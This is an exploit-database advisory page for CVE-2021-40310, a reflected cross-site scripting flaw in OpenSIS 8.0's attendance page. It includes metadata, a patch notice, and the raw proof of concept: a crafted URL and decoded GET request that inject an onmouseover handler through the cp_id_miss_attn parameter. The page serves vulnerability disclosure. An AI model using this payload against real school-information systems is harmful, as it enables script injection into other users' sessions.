OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)

vendor:

OpenSIS

by:

Eric Salario

5,4

CVSS

MEDIUM

Reflected Cross-Site Scripting (XSS)

CWE

Product Name: OpenSIS

Affected Version From: 8.0

Affected Version To: 8.0

Patch Exists: Yes

Related CWE: CVE-2021-40310

CPE: a:os4ed:opensis:8.0

Metasploit: N/A

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=40310, https://www.infosecmatter.com/nessus-plugin-library/?id=40326, https://www.infosecmatter.com/nessus-plugin-library/?id=37418, https://www.infosecmatter.com/nessus-plugin-library/?id=35763, https://www.infosecmatter.com/nessus-plugin-library/?id=35626

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux

2021

OpenSIS 8.0 – ‘cp_id_miss_attn’ Reflected Cross-Site Scripting (XSS)

OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in the TakeAttendance.php via the cp_id_miss_attn parameter. An attacker can exploit this vulnerability by sending a maliciously crafted request to the vulnerable application. This will allow the attacker to execute arbitrary HTML and JavaScript code in the context of the affected application.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of OpenSIS Community Edition.

Source

Exploit-DB raw data:

# Exploit Title: OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)
# Date: 9/24/2021
# Exploit Author: Eric Salario
# Vendor Homepage: http://www.os4ed.com/
# Software Link: https://opensis.com/download
# Version: 8.0
# Tested on: Windows, Linux
# CVE : CVE-2021-40310

OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in the TakeAttendance.php via the cp_id_miss_attn parameter.

1. Login as "teacher".

2. Navigate to (take attendance): http://demo.opensis.com/ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true

Decoded request:

GET /ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7 onmouseover=alert(document.domain) style=position:absolute;width:100%;height:100%;top:0;left:0; z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true HTTP/1.1

3. XSS triggers

PoC Video: https://www.youtube.com/watch?v=aPKPUDmmYpc